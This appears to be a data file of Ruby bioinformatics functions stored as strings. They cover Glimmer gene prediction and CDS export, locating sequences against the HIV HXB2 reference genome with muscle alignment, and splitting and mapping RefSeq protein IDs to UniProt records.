"def create_cds_multi_fasta_file(options)\n require 'bioutils/rich_sequence_utils'\n require 'bioutils/glimmer'\n extend Glimmer\n\n default_options = {\n :cds_multi_fasta_file => \"cds_proteins.fas\",\n :verbose => false\n }\n options.reverse_merge!(default_options)\n\n options = MethodArgumentParser::Parser.check_options options do\n option :root_folder, :required => true, :type => :string\n option :cds_multi_fasta_file, :required => true, :type => :string\n option :sequence_files, :required => true, :type => :array\n\n end\n\n Dir.chdir(options[:root_folder])\n\n files_with_cds = Array.new # a list of files containing\n options[:sequence_files].each do |sequence_file|\n sequence_format = guess_sequence_format(sequence_file)\n if sequence_format == :fasta\n if options[:training_model_prefix]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => options[:training_model_prefix],:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n elsif options[:training_sequence_path]\n model_file_prefix = File.basename(options[:training_sequence_path], File.extname(options[:training_sequence_path])) + \"_glimmer\"\n if File.exists?(model_file_prefix + \".icm\")\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n else\n print \".\"\n end\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => model_file_prefix,:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training sequence ....\"\n else\n print \".\"\n end\n predict_file = predict_genes_using_glimmer(:input_sequence_path => sequence_file,\n :rich_sequence_training_path => options[:training_sequence_path],\n :glimmer_dir_path => options[:glimmer_dir],\n :suppress_messages => true)\n end\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using iterated glimmer....\"\n else\n print \".\"\n end\n predict_using_iterated_glimmer(:suppress_messages => true, :input_sequence_path => sequence_file, :glimmer_predict_filename => File.basename(sequence_file, File.extname(sequence_file)),:glimmer_dir_path => options[:glimmer_dir])\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \".predict\"\n end\n if options[:verbose]\n puts \"Converting #{sequence_file} glimmer prediction to a genbank file ....\"\n else\n print \".\"\n end\n glimmer_genbank_file = glimmer_prediction_to_rich_sequence_file(:suppress_messages => true, :glimmer_predict_file => predict_file, :input_sequence_path => sequence_file)\n files_with_cds << glimmer_genbank_file\n else\n files_with_cds << sequence_file\n end\n end\n\n cds_multi_fasta_protein_file = File.open(options[:cds_multi_fasta_file], \"w\")\n read_cds_and_write_to_file(files_with_cds, cds_multi_fasta_protein_file)\n processing_indicator(5)\n\n cds_multi_fasta_protein_file.close\n end",
"def sequence_locator(seq=\"\",temp_dir=File.dirname($0))\n hxb2_ref = \"TGGAAGGGCTAATTCACTCCCAACGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTAGCAGAACTACACACCAGGGCCAGGGATCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGAGAAGTTAGAAGAAGCCAACAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGAATGGATGACCCGGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACATGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATCCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCAGTGGCGCCCGAACAGGGACCTGAAAGCGAAAGGGAAACCAGAGGAGCTCTCTCGACGCAGGACTCGGCTTGCTGAAGCGCGCACGGCAAGAGGCGAGGGGCGGCGACTGGTGAGTACGCCAAAAATTTTGACTAGCGGAGGCTAGAAGGAGAGAGATGGGTGCGAGAGCGTCAGTATTAAGCGGGGGAGAATTAGATCGATGGGAAAAAATTCGGTTAAGGCCAGGGGGAAAGAAAAAATATAAATTAAAACATATAGTATGGGCAAGCAGGGAGCTAGAACGATTCGCAGTTAATCCTGGCCTGTTAGAAACATCAGAAGGCTGTAGACAAATACTGGGACAGCTACAACCATCCCTTCAGACAGGATCAGAAGAACTTAGATCATTATATAATACAGTAGCAACCCTCTATTGTGTGCATCAAAGGATAGAGATAAAAGACACCAAGGAAGCTTTAGACAAGATAGAGGAAGAGCAAAACAAAAGTAAGAAAAAAGCACAGCAAGCAGCAGCTGACACAGGACACAGCAATCAGGTCAGCCAAAATTACCCTATAGTGCAGAACATCCAGGGGCAAATGGTACATCAGGCCATATCACCTAGAACTTTAAATGCATGGGTAAAAGTAGTAGAAGAGAAGGCTTTCAGCCCAGAAGTGATACCCATGTTTTCAGCATTATCAGAAGGAGCCACCCCACAAGATTTAAACACCATGCTAAACACAGTGGGGGGACATCAAGCAGCCATGCAAATGTTAAAAGAGACCATCAATGAGGAAGCTGCAGAATGGGATAGAGTGCATCCAGTGCATGCAGGGCCTATTGCACCAGGCCAGATGAGAGAACCAAGGGGAAGTGACATAGCAGGAACTACTAGTACCCTTCAGGAACAAATAGGATGGATGACAAATAATCCACCTATCCCAGTAGGAGAAATTTATAAAAGATGGATAATCCTGGGATTAAATAAAATAGTAAGAATGTATAGCCCTACCAGCATTCTGGACATAAGACAAGGACCAAAGGAACCCTTTAGAGACTATGTAGACCGGTTCTATAAAACTCTAAGAGCCGAGCAAGCTTCACAGGAGGTAAAAAATTGGATGACAGAAACCTTGTTGGTCCAAAATGCGAACCCAGATTGTAAGACTATTTTAAAAGCATTGGGACCAGCGGCTACACTAGAAGAAATGATGACAGCATGTCAGGGAGTAGGAGGACCCGGCCATAAGGCAAGAGTTTTGGCTGAAGCAATGAGCCAAGTAACAAATTCAGCTACCATAATGATGCAGAGAGGCAATTTTAGGAACCAAAGAAAGATTGTTAAGTGTTTCAATTGTGGCAAAGAAGGGCACACAGCCAGAAATTGCAGGGCCCCTAGGAAAAAGGGCTGTTGGAAATGTGGAAAGGAAGGACACCAAATGAAAGATTGTACTGAGAGACAGGCTAATTTTTTAGGGAAGATCTGGCCTTCCTACAAGGGAAGGCCAGGGAATTTTCTTCAGAGCAGACCAGAGCCAACAGCCCCACCAGAAGAGAGCTTCAGGTCTGGGGTAGAGACAACAACTCCCCCTCAGAAGCAGGAGCCGATAGACAAGGAACTGTATCCTTTAACTTCCCTCAGGTCACTCTTTGGCAACGACCCCTCGTCACAATAAAGATAGGGGGGCAACTAAAGGAAGCTCTATTAGATACAGGAGCAGATGATACAGTATTAGAAGAAATGAGTTTGCCAGGAAGATGGAAACCAAAAATGATAGGGGGAATTGGAGGTTTTATCAAAGTAAGACAGTATGATCAGATACTCATAGAAATCTGTGGACATAAAGCTATAGGTACAGTATTAGTAGGACCTACACCTGTCAACATAATTGGAAGAAATCTGTTGACTCAGATTGGTTGCACTTTAAATTTTCCCATTAGCCCTATTGAGACTGTACCAGTAAAATTAAAGCCAGGAATGGATGGCCCAAAAGTTAAACAATGGCCATTGACAGAAGAAAAAATAAAAGCATTAGTAGAAATTTGTACAGAGATGGAAAAGGAAGGGAAAATTTCAAAAATTGGGCCTGAAAATCCATACAATACTCCAGTATTTGCCATAAAGAAAAAAGACAGTACTAAATGGAGAAAATTAGTAGATTTCAGAGAACTTAATAAGAGAACTCAAGACTTCTGGGAAGTTCAATTAGGAATACCACATCCCGCAGGGTTAAAAAAGAAAAAATCAGTAACAGTACTGGATGTGGGTGATGCATATTTTTCAGTTCCCTTAGATGAAGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCACAGGGATGGAAAGGATCACCAGCAATATTCCAAAGTAGCATGACAAAAATCTTAGAGCCTTTTAGAAAACAAAATCCAGACATAGTTATCTATCAATACATGGATGATTTGTATGTAGGATCTGACTTAGAAATAGGGCAGCATAGAACAAAAATAGAGGAGCTGAGACAACATCTGTTGAGGTGGGGACTTACCACACCAGACAAAAAACATCAGAAAGAACCTCCATTCCTTTGGATGGGTTATGAACTCCATCCTGATAAATGGACAGTACAGCCTATAGTGCTGCCAGAAAAAGACAGCTGGACTGTCAATGACATACAGAAGTTAGTGGGGAAATTGAATTGGGCAAGTCAGATTTACCCAGGGATTAAAGTAAGGCAATTATGTAAACTCCTTAGAGGAACCAAAGCACTAACAGAAGTAATACCACTAACAGAAGAAGCAGAGCTAGAACTGGCAGAAAACAGAGAGATTCTAAAAGAACCAGTACATGGAGTGTATTATGACCCATCAAAAGACTTAATAGCAGAAATACAGAAGCAGGGGCAAGGCCAATGGACATATCAAATTTATCAAGAGCCATTTAAAAATCTGAAAACAGGAAAATATGCAAGAATGAGGGGTGCCCACACTAATGATGTAAAACAATTAACAGAGGCAGTGCAAAAAATAACCACAGAAAGCATAGTAATATGGGGAAAGACTCCTAAATTTAAACTGCCCATACAAAAGGAAACATGGGAAACATGGTGGACAGAGTATTGGCAAGCCACCTGGATTCCTGAGTGGGAGTTTGTTAATACCCCTCCCTTAGTGAAATTATGGTACCAGTTAGAGAAAGAACCCATAGTAGGAGCAGAAACCTTCTATGTAGATGGGGCAGCTAACAGGGAGACTAAATTAGGAAAAGCAGGATATGTTACTAATAGAGGAAGACAAAAAGTTGTCACCCTAACTGACACAACAAATCAGAAGACTGAGTTACAAGCAATTTATCTAGCTTTGCAGGATTCGGGATTAGAAGTAAACATAGTAACAGACTCACAATATGCATTAGGAATCATTCAAGCACAACCAGATCAAAGTGAATCAGAGTTAGTCAATCAAATAATAGAGCAGTTAATAAAAAAGGAAAAGGTCTATCTGGCATGGGTACCAGCACACAAAGGAATTGGAGGAAATGAACAAGTAGATAAATTAGTCAGTGCTGGAATCAGGAAAGTACTATTTTTAGATGGAATAGATAAGGCCCAAGATGAACATGAGAAATATCACAGTAATTGGAGAGCAATGGCTAGTGATTTTAACCTGCCACCTGTAGTAGCAAAAGAAATAGTAGCCAGCTGTGATAAATGTCAGCTAAAAGGAGAAGCCATGCATGGACAAGTAGACTGTAGTCCAGGAATATGGCAACTAGATTGTACACATTTAGAAGGAAAAGTTATCCTGGTAGCAGTTCATGTAGCCAGTGGATATATAGAAGCAGAAGTTATTCCAGCAGAAACAGGGCAGGAAACAGCATATTTTCTTTTAAAATTAGCAGGAAGATGGCCAGTAAAAACAATACATACTGACAATGGCAGCAATTTCACCGGTGCTACGGTTAGGGCCGCCTGTTGGTGGGCGGGAATCAAGCAGGAATTTGGAATTCCCTACAATCCCCAAAGTCAAGGAGTAGTAGAATCTATGAATAAAGAATTAAAGAAAATTATAGGACAGGTAAGAGATCAGGCTGAACATCTTAAGACAGCAGTACAAATGGCAGTATTCATCCACAATTTTAAAAGAAAAGGGGGGATTGGGGGGTACAGTGCAGGGGAAAGAATAGTAGACATAATAGCAACAGACATACAAACTAAAGAATTACAAAAACAAATTACAAAAATTCAAAATTTTCGGGTTTATTACAGGGACAGCAGAAATCCACTTTGGAAAGGACCAGCAAAGCTCCTCTGGAAAGGTGAAGGGGCAGTAGTAATACAAGATAATAGTGACATAAAAGTAGTGCCAAGAAGAAAAGCAAAGATCATTAGGGATTATGGAAAACAGATGGCAGGTGATGATTGTGTGGCAAGTAGACAGGATGAGGATTAGAACATGGAAAAGTTTAGTAAAACACCATATGTATGTTTCAGGGAAAGCTAGGGGATGGTTTTATAGACATCACTATGAAAGCCCTCATCCAAGAATAAGTTCAGAAGTACACATCCCACTAGGGGATGCTAGATTGGTAATAACAACATATTGGGGTCTGCATACAGGAGAAAGAGACTGGCATTTGGGTCAGGGAGTCTCCATAGAATGGAGGAAAAAGAGATATAGCACACAAGTAGACCCTGAACTAGCAGACCAACTAATTCATCTGTATTACTTTGACTGTTTTTCAGACTCTGCTATAAGAAAGGCCTTATTAGGACACATAGTTAGCCCTAGGTGTGAATATCAAGCAGGACATAACAAGGTAGGATCTCTACAATACTTGGCACTAGCAGCATTAATAACACCAAAAAAGATAAAGCCACCTTTGCCTAGTGTTACGAAACTGACAGAGGATAGATGGAACAAGCCCCAGAAGACCAAGGGCCACAGAGGGAGCCACACAATGAATGGACACTAGAGCTTTTAGAGGAGCTTAAGAATGAAGCTGTTAGACATTTTCCTAGGATTTGGCTCCATGGCTTAGGGCAACATATCTATGAAACTTATGGGGATACTTGGGCAGGAGTGGAAGCCATAATAAGAATTCTGCAACAACTGCTGTTTATCCATTTTCAGAATTGGGTGTCGACATAGCAGAATAGGCGTTACTCGACAGAGGAGAGCAAGAAATGGAGCCAGTAGATCCTAGACTAGAGCCCTGGAAGCATCCAGGAAGTCAGCCTAAAACTGCTTGTACCAATTGCTATTGTAAAAAGTGTTGCTTTCATTGCCAAGTTTGTTTCATAACAAAAGCCTTAGGCATCTCCTATGGCAGGAAGAAGCGGAGACAGCGACGAAGAGCTCATCAGAACAGTCAGACTCATCAAGCTTCTCTATCAAAGCAGTAAGTAGTACATGTAACGCAACCTATACCAATAGTAGCAATAGTAGCATTAGTAGTAGCAATAATAATAGCAATAGTTGTGTGGTCCATAGTAATCATAGAATATAGGAAAATATTAAGACAAAGAAAAATAGACAGGTTAATTGATAGACTAATAGAAAGAGCAGAAGACAGTGGCAATGAGAGTGAAGGAGAAATATCAGCACTTGTGGAGATGGGGGTGGAGATGGGGCACCATGCTCCTTGGGATGTTGATGATCTGTAGTGCTACAGAAAAATTGTGGGTCACAGTCTATTATGGGGTACCTGTGTGGAAGGAAGCAACCACCACTCTATTTTGTGCATCAGATGCTAAAGCATATGATACAGAGGTACATAATGTTTGGGCCACACATGCCTGTGTACCCACAGACCCCAACCCACAAGAAGTAGTATTGGTAAATGTGACAGAAAATTTTAACATGTGGAAAAATGACATGGTAGAACAGATGCATGAGGATATAATCAGTTTATGGGATCAAAGCCTAAAGCCATGTGTAAAATTAACCCCACTCTGTGTTAGTTTAAAGTGCACTGATTTGAAGAATGATACTAATACCAATAGTAGTAGCGGGAGAATGATAATGGAGAAAGGAGAGATAAAAAACTGCTCTTTCAATATCAGCACAAGCATAAGAGGTAAGGTGCAGAAAGAATATGCATTTTTTTATAAACTTGATATAATACCAATAGATAATGATACTACCAGCTATAAGTTGACAAGTTGTAACACCTCAGTCATTACACAGGCCTGTCCAAAGGTATCCTTTGAGCCAATTCCCATACATTATTGTGCCCCGGCTGGTTTTGCGATTCTAAAATGTAATAATAAGACGTTCAATGGAACAGGACCATGTACAAATGTCAGCACAGTACAATGTACACATGGAATTAGGCCAGTAGTATCAACTCAACTGCTGTTAAATGGCAGTCTAGCAGAAGAAGAGGTAGTAATTAGATCTGTCAATTTCACGGACAATGCTAAAACCATAATAGTACAGCTGAACACATCTGTAGAAATTAATTGTACAAGACCCAACAACAATACAAGAAAAAGAATCCGTATCCAGAGAGGACCAGGGAGAGCATTTGTTACAATAGGAAAAATAGGAAATATGAGACAAGCACATTGTAACATTAGTAGAGCAAAATGGAATAACACTTTAAAACAGATAGCTAGCAAATTAAGAGAACAATTTGGAAATAATAAAACAATAATCTTTAAGCAATCCTCAGGAGGGGACCCAGAAATTGTAACGCACAGTTTTAATTGTGGAGGGGAATTTTTCTACTGTAATTCAACACAACTGTTTAATAGTACTTGGTTTAATAGTACTTGGAGTACTGAAGGGTCAAATAACACTGAAGGAAGTGACACAATCACCCTCCCATGCAGAATAAAACAAATTATAAACATGTGGCAGAAAGTAGGAAAAGCAATGTATGCCCCTCCCATCAGTGGACAAATTAGATGTTCATCAAATATTACAGGGCTGCTATTAACAAGAGATGGTGGTAATAGCAACAATGAGTCCGAGATCTTCAGACCTGGAGGAGGAGATATGAGGGACAATTGGAGAAGTGAATTATATAAATATAAAGTAGTAAAAATTGAACCATTAGGAGTAGCACCCACCAAGGCAAAGAGAAGAGTGGTGCAGAGAGAAAAAAGAGCAGTGGGAATAGGAGCTTTGTTCCTTGGGTTCTTGGGAGCAGCAGGAAGCACTATGGGCGCAGCCTCAATGACGCTGACGGTACAGGCCAGACAATTATTGTCTGGTATAGTGCAGCAGCAGAACAATTTGCTGAGGGCTATTGAGGCGCAACAGCATCTGTTGCAACTCACAGTCTGGGGCATCAAGCAGCTCCAGGCAAGAATCCTGGCTGTGGAAAGATACCTAAAGGATCAACAGCTCCTGGGGATTTGGGGTTGCTCTGGAAAACTCATTTGCACCACTGCTGTGCCTTGGAATGCTAGTTGGAGTAATAAATCTCTGGAACAGATTTGGAATCACACGACCTGGATGGAGTGGGACAGAGAAATTAACAATTACACAAGCTTAATACACTCCTTAATTGAAGAATCGCAAAACCAGCAAGAAAAGAATGAACAAGAATTATTGGAATTAGATAAATGGGCAAGTTTGTGGAATTGGTTTAACATAACAAATTGGCTGTGGTATATAAAATTATTCATAATGATAGTAGGAGGCTTGGTAGGTTTAAGAATAGTTTTTGCTGTACTTTCTATAGTGAATAGAGTTAGGCAGGGATATTCACCATTATCGTTTCAGACCCACCTCCCAACCCCGAGGGGACCCGACAGGCCCGAAGGAATAGAAGAAGAAGGTGGAGAGAGAGACAGAGACAGATCCATTCGATTAGTGAACGGATCCTTGGCACTTATCTGGGACGATCTGCGGAGCCTGTGCCTCTTCAGCTACCACCGCTTGAGAGACTTACTCTTGATTGTAACGAGGATTGTGGAACTTCTGGGACGCAGGGGGTGGGAAGCCCTCAAATATTGGTGGAATCTCCTACAGTATTGGAGTCAGGAACTAAAGAATAGTGCTGTTAGCTTGCTCAATGCCACAGCCATAGCAGTAGCTGAGGGGACAGATAGGGTTATAGAAGTAGTACAAGGAGCTTGTAGAGCTATTCGCCACATACCTAGAAGAATAAGACAGGGCTTGGAAAGGATTTTGCTATAAGATGGGTGGCAAGTGGTCAAAAAGTAGTGTGATTGGATGGCCTACTGTAAGGGAAAGAATGAGACGAGCTGAGCCAGCAGCAGATAGGGTGGGAGCAGCATCTCGAGACCTGGAAAAACATGGAGCAATCACAAGTAGCAATACAGCAGCTACCAATGCTGCTTGTGCCTGGCTAGAAGCACAAGAGGAGGAGGAGGTGGGTTTTCCAGTCACACCTCAGGTACCTTTAAGACCAATGACTTACAAGGCAGCTGTAGATCTTAGCCACTTTTTAAAAGAAAAGGGGGGACTGGAAGGGCTAATTCACTCCCAAAGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTAGCAGAACTACACACCAGGGCCAGGGGTCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGATAAGATAGAAGAGGCCAATAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGGATGGATGACCCGGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACGTGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATCCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCA\"\n hxb2_l = hxb2_ref.size\n head = \"\"\n 8.times {head << (65 + rand(25)).chr}\n temp_file = temp_dir + \"/\" + head + \"_temp\"\n temp_aln = temp_dir + \"/\" + head + \"_temp_aln\"\n\n l1 = 0\n l2 = 0\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts hxb2_ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n\n begin\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n if ref_size > 1.3*(seq.size)\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n max_seq = aln_test2.scan(/[ACGT]+/).max_by(&:length)\n aln_test2 =~ /#{max_seq}/\n before_aln_seq = $`\n before_aln = $`.size\n post_aln_seq = $'\n post_aln = $'.size\n before_aln_seq_size = before_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b1 = (1.3 * before_aln_seq_size).to_i\n post_aln_seq_size = post_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b2 = (1.3 * post_aln_seq_size).to_i\n if (before_aln > seq.size) and (post_aln <= seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1)]\n l1 = l1 + (before_aln - b1)\n elsif (post_aln > seq.size) and (before_aln <= seq.size)\n ref = ref[before_aln..(ref_size - post_aln - 1 + b2)]\n l2 = l2 + post_aln - b2\n elsif (post_aln > seq.size) and (before_aln > seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1 + b2)]\n l1 = l1 + (before_aln - b1)\n l2 = l2 + (post_aln - b2)\n end\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n end\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n\n if g1 == g2 and (s1 + g1 + s2) == ref.size\n if s1 > s2 and g2 > 2*s2\n ref = ref[0..(-g2-1)]\n repeat = 1\n l2 = l2 + g2\n elsif s1 < s2 and g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n else\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n\n while repeat == 1\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n #refine alignment\n\n if ref =~ /^(\\-+)/\n l1 = l1 - $1.size\n elsif ref =~ /(\\-+)$/\n l2 = l2 + $1.size\n end\n\n if (hxb2_l - l2 - 1) >= l1\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n ref_size = ref.size\n sim_count = 0\n (0..(ref_size-1)).each do |n|\n ref_base = ref[n]\n test_base = aln_test[n]\n sim_count += 1 if ref_base == test_base\n end\n similarity = (sim_count/ref_size.to_f*100).round(1)\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n loc_p1 = l1 + 1\n loc_p2 = hxb2_l - l2\n if seq.size != (loc_p2 - loc_p1 + 1)\n indel = true\n elsif aln_test.include?(\"-\")\n indel = true\n else\n indel = false\n end\n return [loc_p1,loc_p2,similarity,indel,aln_test,ref]\n else\n return [0,0,0,0,0,0,0]\n end\n rescue\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n return [0,0,0,0,0,0,0]\n end\nend",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
